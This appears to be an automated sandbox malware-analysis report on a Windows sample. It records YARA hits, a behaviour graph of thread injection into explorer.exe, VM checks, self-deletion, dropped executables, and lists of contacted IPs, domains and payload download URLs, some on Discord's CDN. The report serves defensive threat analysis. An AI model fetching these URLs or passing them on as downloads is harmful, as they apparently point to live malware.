Source: Yara match File source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 511932 Sample: cnv622JnZv.exe Startdate: 29/10/2021 Architecture: WINDOWS Score: 100 65 znpst.top 2->65 67 nusurtal4f.net 2->67 91 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->91 93 Multi AV Scanner detection for domain / URL 2->93 95 Antivirus detection for URL or domain 2->95 97 13 other signatures 2->97 11 cnv622JnZv.exe 2->11         started        13 jejhieg 2->13         started        signatures3 process4 signatures5 16 cnv622JnZv.exe 11->16         started        141 Machine Learning detection for dropped file 13->141 19 jejhieg 13->19         started        process6 signatures7 83 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 16->83 85 Maps a DLL or memory area into another process 16->85 87 Checks if the current machine is a virtual machine (disk enumeration) 16->87 89 Creates a thread in another existing process (thread injection) 16->89 21 explorer.exe 14 16->21 injected process8 dnsIp9 69 216.128.137.31, 80 AS-CHOOPAUS United States 21->69 71 sysaheu90.top 185.98.87.159, 49756, 49757, 49758 VM-HOSTINGRU Russian Federation 21->71 73 3 other IPs or domains 21->73 47 C:\Users\user\AppData\Roaming\jejhieg, PE32 21->47 dropped 49 C:\Users\user\AppData\Roaming\bejhieg, PE32 21->49 dropped 51 C:\Users\user\AppData\Local\Temp\C5EA.exe, PE32 21->51 dropped 53 9 other files (8 malicious) 21->53 dropped 99 System process connects to network (likely due to code injection or exploit) 21->99 101 Benign windows process drops PE files 21->101 103 Deletes itself after installation 21->103 105 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->105 26 8615.exe 1 21->26         started        30 66A4.exe 21 6 21->30         started        33 C5EA.exe 21->33         started        35 5 other processes 21->35 file10 signatures11 process12 dnsIp13 55 C:\Users\user\AppData\Local\Temp\1105.tmp, PE32 26->55 dropped 115 Multi AV Scanner detection for dropped file 26->115 117 DLL reload attack detected 26->117 119 Detected unpacking (changes PE section rights) 26->119 137 5 other signatures 26->137 75 cdn.discordapp.com 162.159.130.233, 443, 49804, 49805 CLOUDFLARENETUS United States 30->75 57 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 30->57 dropped 121 Machine Learning detection for dropped file 30->121 123 Writes to foreign memory regions 30->123 139 3 other signatures 30->139 37 AdvancedRun.exe 1 30->37         started        125 Contains functionality to inject code into remote processes 33->125 127 Injects a PE file into a foreign processes 33->127 39 C5EA.exe 33->39         started        77 91.219.236.97, 49847, 80 SERVERASTRA-ASHU Hungary 35->77 79 93.115.20.139, 28978, 49842 MVPShttpswwwmvpsnetEU Romania 35->79 81 4 other IPs or domains 35->81 59 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 35->59 dropped 61 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 35->61 dropped 129 Antivirus detection for dropped file 35->129 131 Detected unpacking (overwrites its own PE header) 35->131 133 Early bird code injection technique detected 35->133 135 Queues an APC in another process (thread injection) 35->135 42 977B.exe 35->42         started        file14 signatures15 process16 file17 45 AdvancedRun.exe 37->45         started        107 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 39->107 109 Maps a DLL or memory area into another process 39->109 111 Checks if the current machine is a virtual machine (disk enumeration) 39->111 113 Creates a thread in another existing process (thread injection) 39->113 63 C:\Users\user\AppData\Local\...\sqtvvs.exe, PE32 42->63 dropped signatures18 process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.98.87.159
 privacytoolzforyou-6000.top Russian Federation
205840 VM-HOSTINGRU false
162.159.130.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
91.219.236.97
 unknown Hungary
56322 SERVERASTRA-ASHU true
172.67.160.46
 toptelete.top United States
13335 CLOUDFLARENETUS false
216.128.137.31
 unknown United States
20473 AS-CHOOPAUS true
93.115.20.139
 unknown Romania
202448 MVPShttpswwwmvpsnetEU false
162.159.133.233
 unknown United States
13335 CLOUDFLARENETUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
privacytoolzforyou-6000.top 185.98.87.159 true
toptelete.top 172.67.160.46 true
cdn.discordapp.com 162.159.130.233 true
znpst.top 61.98.7.132 true
nusurtal4f.net 45.141.84.21 true
hajezey1.top 185.98.87.159 true
sysaheu90.top 185.98.87.159 true
telegalive.top unknown unknown
xacokuo8.top unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sysaheu90.top/game.exe true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpg false
    		high
    http://91.219.236.97/ true
    • Avira URL Cloud: safe
    		 unknown
    https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg false
      		high
      https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg false
        		high
        http://toptelete.top/agrybirdsgamerept true
        • Avira URL Cloud: malware
        		 unknown
        https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg false
          		high
          http://privacytoolzforyou-6000.top/downloads/toolspab2.exe true
          • Avira URL Cloud: malware
          		 unknown
          http://hajezey1.top/ true
          • Avira URL Cloud: malware
          		 unknown
          https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg false
            		high
            http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861 true
            • Avira URL Cloud: safe
            		 unknown